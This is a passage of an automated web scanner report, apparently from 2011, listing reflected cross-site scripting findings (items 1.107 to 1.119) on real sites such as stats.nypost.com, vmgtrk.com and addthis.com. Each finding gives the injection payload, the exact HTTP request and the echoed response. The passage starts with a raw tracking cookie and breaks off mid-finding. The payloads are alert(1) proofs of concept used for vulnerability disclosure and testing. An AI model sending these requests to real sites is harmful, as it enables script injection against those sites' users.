Cookie: adImpCount=FM4QLcaMabkQsarcOBMTT_qd1v3GGeBcoJK0MOl0KG-Y481wEkFtGX7HudJA1SwJY9n9GIWJHDTqbWbTuEexfNzeQdD3uMEbsSJGoH6nZcvCzn_rbeUw4N91a2HFDwx7Wl6PMIbl8VoYkne2SJkXTcTcqhcYEXFRrx1COjt-xQdPBFgEFn33aBMbAqV_0XEIioGKZSAftgkVYZTzRayYVmmTJdkIn7237siDdt9MzJqJi5T6FYiHf9o35IlREqTNFveKpsZQ30qpNKi15RJt04BNhaXhDlSq6EvznmypgJEkna5GLuKLpEu7eZEeTMi7F6sK_rp2soXzwueUGRFartfze4TUjaNUIXjW8HpTdIXW8uxzXCZHw_1hR9tJint6dsPDEFhRxd_Mub3GEI1LN-tHiIt90vCIZrFIVkRcrTHWSuqW6r5ZIwUtscKD_QT9RhXOUlzX0--TPsid5EqGlKaR8fzj-CgEMyGy4iMXI1WxKbXh9CKgY6S3LP_zmj75AgqPmyW7n-K57XLwzviwi0UeS0QSNHqXIchkIsQCETGT3yD6yFHAIahzcKETB33UwCPq2GhFCxYySztyqVkKk9fqbN4-YU4FEz0wwkD5vsFOGK_87tDq8e92tNo34emrEgGEUj-NO1cCBiKRN0KNH1ftcOyrV1OLoU5x9aMp-92fSDdx8Pm4E6I95eyuD_EIQOJmu9RYL7YOIJ6DsZdIlrLgwokXGxtO8_jRpe316oYDuH7CMSEB_S7o6Xm3tvDBfH77IJVG0N6dycTdcjtOKF0Cz2TbSViJ-oT4nVLBUOQ7zE-OOnjPRQ6BZXJCY0oCMrkBfNspHfysXvb7GqOmGNAITbT7Z6AmMx12CVhoBV8PCKPJoslzeIPsOadDQ5GApTHEeUcb_20FLCe61hOZos4ND7pDMbh_Nz4asivfvnRRu_fmnuOn7vvqoBU15Zmhn2aVSJry2cIXXaBci8YswRWnz3-1lFmH8NpHbFKrPy3hBObtf8ALhKpons6mVN9Ng_E4yJzpnqztVh_CB-KMHlM4At-mEES-WC-9xjj3t3cnzJw50Wq6BglWv58k-98YkSbTm3kPOUdWBiWoLi0oN0AgeHAdeFjGHSfjDkMzE5p5e_oJDB2Um-liToPNlmN15FjrbRSBV8G9GwEgDofeTOxem0_gMApf3YWMEr3kQAQnXe4HjQMTBDROpzYRLGofXKwaWNtdj1-GtHzOUqyENh2k1W2pFwJOjkpENaGP0tqhG0BtDC_eTH_Ts10GvA6WhyC22lBHkEPeNKFx7RiTWcHRNLuEX2-svGHkdhG53xdJo9qHwXLy45nY7LSpUbn803gUXikBp5CFzTHxBLV0jIUUb9PGuTCtW-hvx86uIjCl7RrDpkAZSszkN92RjKcOSHyDTphfUd0ZqQTAbIYvZtNr_wQwmIEY35OpKNWhyGwNPlAh_ANj4laYRoTBJxnGQ7wgWZt0CSpxlrfASU5W2a6su59vlF-h6V4zet13tlPhRMEiyYm825vPff2nJDmVgFpIKs_vIo7sFsppJ43d8oTEgInxyFT6vScD8wD9aZjmMC0w6HS0HlWcNr1j-PhGS2ikng608Ubz0iz0TtbwhgQZq5IdyfSisA1KqAwL3sZErWVr76O0bqQTEPkhkBBP4vNeu_uKiDKKl73FedJ05pAh6qV14YUcXNrVmSSI1FzEzQ65n9aZSqRKUiLFvw0_FzJQi642bOf20jjwau1yNWbWc_OZc_OPEEY_dnkrDVdmeoMCTOxN_xl7C-3y_RTPHX8tA53fNzl8qfH897V8IhWPCe1DLrZ9lRQtTCZwINCJg6hyABA61hUJaqPVyX7fV7Pa1PW0-yYXb_USKuin2pZCaBr_uY_2UBH6Bm4UktJmd6sVQvXXEqhe9E5LsneRLFWbUdQszzXxD5egB584f5Iq0VaWXCofBTTX6PHG8K6lFCCN0TTnR1jCog1stnuLrLH_TLw0g_9l8j595C25K_O7nXuUqzkznnHJS2oIivO1MtzkhTD8tggahFLAwdtimGiAzgIbfwh3tPXiXBZiPEc6jmaSPplk32IRb7Tl08IFN1OghxmtWT_y47n5TtZS9Ky93uZuiaOzgh6RPqobZokxjCycBjwJJ-OqeZ3YCRoZ5XICuXWVHfipzGbbMT7XgVwScM8a1QBrHN9hJ559oPfWNXLGQYJF8WI3xWHXIXB86oJHZOjQy7IdFPhSTsF2yrOAh9s72IpPTbIy0ryOZR5kHQoGKZaDQPufKDCKOsAs5UyVIQTo0ztnk49jL0nNFaq4usSu0TQiqXjP7CIAd_5FtzMDApKZjTZ9VwWqS_hi3W5FLLAcz8HdwETYSzM0iqfAGlpVHegt_TIDru8ZVGlo2JchDi2BE0kETeswJqfjIM8eqB1CZXkSQ7Z_VjVnYvzBVNyB9AksqD2lQZb2X0IEqN843HNpf9LL79Gl1KBsoCUhcPx0GvFd6LDM_NesCTjn8qfPanRhqfFt_Mz5uEh2A3HFoGkf8ppxZxL6925r_GgrDoF5KcCR0z_dNX3kzjeRcgqW8BhR69hQhpeZrZnEJ52ohaD3WrTkTUj4YJ6Td6PLaDgaJxtMnnZrfAlG0SSD0cpxrho96Q5aYPi9en1l66z-sdlCvM2HwHHvukFOG1d5EaBIpvNzbIjvRqOmzYDhYzHqcbaWBj06fa97gFmB5jdUYj5pSK3CD2Yuk0PK5FYetxUklFsdind5sgdq4uZcD2KLx9Zf7jaxnwz6suaPAnsGTiQgiUvKmhf1LhrytQYKxDy-h4T29iDJXVr_vHZNnZTSMo3FOqO76V7e32Mz948gl-62XtaGUS8uw5NCpnBNXGUaigKHIg84ueIc4t5Yp3YWsvWh2i358DyJOyzgpnBHfTKfL-U_Busa7oEsjSep6DjzyTifPlN_P4smDk3kLq_iHqbXQ5svnKXdR0fKJFj2seLH8BbDFMsPiVsBIQ44v1dSgCalvY0FxkkJ5w0OZeWQP34jwLIAF168EspxmNyBZAxjbmEt8kjG7dRMykkE2LHXhz6x23r28D5B1-HnnnOalxwc8pVPIG67O2v9MtuGBypG0oO1sVM2Vbs7HFOP9G8F0R3RxUgEDCioFUEKPhCNOF99OExqDKIS0y-D3H8kAPjeIydjzyH2Ws7PKyE1dGY4WEg1BMpUBtxwX2H-7BKKuqPq2iSXQ7keQevoGn3niEhwrkx3I523rYfTIHt_4ntge3wT6HrPHWBJpD6Hr91CxZq9sV9Jmp33y8raIDjGaQc_8c0sEToR_ODvxgcgJ32KFhukOoA2cRquiPMf-CiwpIi4ayv6yWP-tXJ__VAnBFQL8j9ZaHEtyQCLoYLPIaWZ3CmWGBp_xNH3WlqbXOyrf_ATBbMNQCTCxOAxrjPhFf5rtBKDWKm24urmdIW_ZXAbYCZmLsz6YiVpaNRjSC9cVWjph0vEeVDn94cCqpnjE0z1BuYxXU6aN8KvfgQRgY4ZaCnGHk-ja9faWwfL-_-bPH3YFMHRKzulr4fOZJphXH_Th5iLN0VczjS8Jh9TEFyiFtC1iUdTIWwbUQ3HeHZgtn1yA0PmWEs3TAjOPMDh8jx0WcV7eT-TG33S7CRXLm9kG5yXyNmxCrzJ; fc=8Kodsw1QIRNJBnpSjhgJ0uErbJkTJYsNaCBFpaSI5yP-4Y1aL5T0hqj7dZyIiRNIWMZgDtcnKM_xOWbKnaMIO3_WyzVPxgN3VkTg_cPuFqziwJJKZupkpjfaBrjFc6z7RfOX1MD02-o6SZ1b0c_HcUiZ1Q4B83ZCB0ZNq2R2Ygc; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=15012%7C15011%7C15011%7C15013%7Cundefined%7C15011%7C15011%7C15011%7C15011%7C15011%7C15013%7C15013%7C14983%7C15013%7C15003; rv=1; pf=gVcpu03qRQgTB5NuU1EqIYqEr4b4Fq-og3GojR5p24eyrpLutjrg3FTJXr1E8PV6vkLTiGPWsGKJ1Wrqhl-HhQ7j1HFoP4OsobTnoYCCxvnKntOZfYFXgkvEXaL1UobLYMC1xk5bi3WvwsH-xYl33kP849CF7hcjVhWHTHUUYTis0H9ih5-5vFSOsVYuhQt6Iv4QeHxZTxJkHtgeP2GkzQt7XxlMyKRnDT2fVADwdo44PGNU_vJbXyHKcL6jneNP4-z_78WwfuPYpNg79jqGRprSVFacyOS-5Ebs506rt3Aem2wjSmTSakSnCA2AgYS6r3vWJ5sNwMJc7eO_e5WNawlDHzxcnnyKiFnoDhsGNc4pAxb4A7I47CNUJ6AbwwHHAatLSIvwiSzIGMiHluajY8fLBNpf3ENHcSGhLyQY8Gw-qep7oDaftEDZ2hKV8ANOevweg3MZu04fOjiPLG71HIPlyME1Zf31UWf3v_Xcs7g; uid=3011330574290390485

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 07-Aug-2011 02:09:01 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:09:00 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=3889232801873965617&fpid=4&nu=n&t=&sp=2604a"><script>alert(1)</script>f2f82733516&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.107. http://stats.nypost.com/fb/scoreboard.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.nypost.com
Path:   /fb/scoreboard.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ad94"><script>alert(1)</script>e2be14c4e6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fb/scoreboard.asp?2ad94"><script>alert(1)</script>e2be14c4e6c=1 HTTP/1.1
Host: stats.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=10
Date: Tue, 08 Feb 2011 02:34:42 GMT
Content-Length: 29771
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>S
...[SNIP]...
<META content="60;/fb/scoreboard.asp?2ad94"><script>alert(1)</script>e2be14c4e6c=1&amp;meta=true" http-equiv="Refresh">
...[SNIP]...

1.108. http://stats.nypost.com/mlb/scoreboard.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.nypost.com
Path:   /mlb/scoreboard.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 125f5"><script>alert(1)</script>5d9a54190c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mlb/scoreboard.asp?125f5"><script>alert(1)</script>5d9a54190c8=1 HTTP/1.1
Host: stats.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Cache-Control: private, max-age=10
Date: Tue, 08 Feb 2011 02:34:43 GMT
Content-Length: 29152
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>S
...[SNIP]...
<META content="60;/mlb/scoreboard.asp?125f5"><script>alert(1)</script>5d9a54190c8=1&amp;meta=true" http-equiv="Refresh">
...[SNIP]...

1.109. http://stats.nypost.com/nba/scoreboard.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.nypost.com
Path:   /nba/scoreboard.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2d26"><script>alert(1)</script>cf0c3971885 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nba/scoreboard.asp?d2d26"><script>alert(1)</script>cf0c3971885=1 HTTP/1.1
Host: stats.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Cache-Control: private, max-age=10
Date: Tue, 08 Feb 2011 02:34:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 48251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>S
...[SNIP]...
<META content="60;/nba/scoreboard.asp?d2d26"><script>alert(1)</script>cf0c3971885=1&meta=true" http-equiv="Refresh">
...[SNIP]...

1.110. http://stats.nypost.com/nhl/scoreboard.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.nypost.com
Path:   /nhl/scoreboard.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc282"><script>alert(1)</script>a88736d6b0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nhl/scoreboard.asp?bc282"><script>alert(1)</script>a88736d6b0d=1 HTTP/1.1
Host: stats.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Cache-Control: private, max-age=10
Date: Tue, 08 Feb 2011 02:34:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>S
...[SNIP]...
<META content="60;/nhl/scoreboard.asp?bc282"><script>alert(1)</script>a88736d6b0d=1&meta=true" http-equiv="Refresh">
...[SNIP]...

1.111. http://vmgtrk.com/tracking202/static/landing.php [lpip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vmgtrk.com
Path:   /tracking202/static/landing.php

Issue detail

The value of the lpip request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dc80'%3balert(1)//b154865b622 was submitted in the lpip parameter. This input was echoed as 7dc80';alert(1)//b154865b622 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tracking202/static/landing.php?lpip=72467dc80'%3balert(1)//b154865b622 HTTP/1.1
Host: vmgtrk.com
Proxy-Connection: keep-alive
Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 02:06:54 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 3176

function t202Init(){
   //this grabs the t202kw, but if they set a forced kw, this will be replaced
   
   if (readCookie('t202forcedkw')) {
       var t202kw = readCookie('t202forcedkw');
   } else {
       var t202kw = t202GetVar('t202kw');
   }

   var lpip = '72467dc80';alert(1)//b154865b622';
   var t202id = t202GetVar('t202id');
   var OVRAW = t202GetVar('OVRAW');
   var OVKEY = t202GetVar('OVKEY');
   var OVMTC = t202GetVar('OVMTC');
   var c1 = t202GetVar('c1');
   var c2 = t202GetVar('c2');
   var
...[SNIP]...

1.112. http://vmgtrk.com/tracking202/static/landing.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vmgtrk.com
Path:   /tracking202/static/landing.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1483e'%3balert(1)//07436e66004 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1483e';alert(1)//07436e66004 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tracking202/static/landing.php?lpip=/1483e'%3balert(1)//07436e660047246 HTTP/1.1
Host: vmgtrk.com
Proxy-Connection: keep-alive
Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 02:06:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 3177

function t202Init(){
   //this grabs the t202kw, but if they set a forced kw, this will be replaced
   
   if (readCookie('t202forcedkw')) {
       var t202kw = readCookie('t202forcedkw');
   } else {
       var t202kw = t202GetVar('t202kw');
   }

   var lpip = '/1483e';alert(1)//07436e660047246';
   var t202id = t202GetVar('t202id');
   var OVRAW = t202GetVar('OVRAW');
   var OVKEY = t202GetVar('OVKEY');
   var OVMTC = t202GetVar('OVMTC');
   var c1 = t202GetVar('c1');
   var c2 = t202GetVar('c2');

...[SNIP]...

1.113. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed9c6"-alert(1)-"bc9b8de2ed6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.phped9c6"-alert(1)-"bc9b8de2ed6 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 05:31:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=ijgl22u3d4netlsb9jif12leu4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1497
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.phped9c6"-alert(1)-"bc9b8de2ed6";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

1.114. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 14ca5<script>alert(1)</script>f3ce7029187 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php14ca5<script>alert(1)</script>f3ce7029187 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 05:31:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=edlikb5dctrbqo0f3e0jmjc3l0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1523
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php14ca5<script>alert(1)</script>f3ce7029187</strong>
...[SNIP]...

1.115. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55ee9"-alert(1)-"40f54fd3f8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/55ee9"-alert(1)-"40f54fd3f8d HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 05:31:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 93707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/55ee9"-alert(1)-"40f54fd3f8d";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

1.116. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 181e9"style%3d"x%3aexpression(alert(1))"e7f1e4a7067 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 181e9"style="x:expression(alert(1))"e7f1e4a7067 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?v=250&username=starbucks&url=http://www.starbucks.com/sm/181e9"style%3d"x%3aexpression(alert(1))"e7f1e4a7067ooth HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 05:31:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 94047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.starbucks.com/sm/181e9"style="x:expression(alert(1))"e7f1e4a7067ooth" />
...[SNIP]...

1.117. http://www.addthis.com/bookmark.php [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4656"style%3d"x%3aexpression(alert(1))"5ee5d2cdcc7 was submitted in the url parameter. This input was echoed as c4656"style="x:expression(alert(1))"5ee5d2cdcc7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?v=250&username=starbucks&url=http://www.starbucks.com/smoothc4656"style%3d"x%3aexpression(alert(1))"5ee5d2cdcc7 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 05:31:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 94045

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.starbucks.com/smoothc4656"style="x:expression(alert(1))"5ee5d2cdcc7" />
...[SNIP]...

1.118. http://www.addthis.com/bookmark.php [username parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a651a"%20style%3dx%3aexpression(alert(1))%209a725fd9f7d was submitted in the username parameter. This input was echoed as a651a\" style=x:expression(alert(1)) 9a725fd9f7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?v=250&username=starbucksa651a"%20style%3dx%3aexpression(alert(1))%209a725fd9f7d&url=http://www.starbucks.com/smooth HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 05:31:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 94011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="pub" name="pub" value="starbucksa651a\" style=x:expression(alert(1)) 9a725fd9f7d" />
...[SNIP]...

1.119. http://www.addthis.com/bookmark.php [v parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

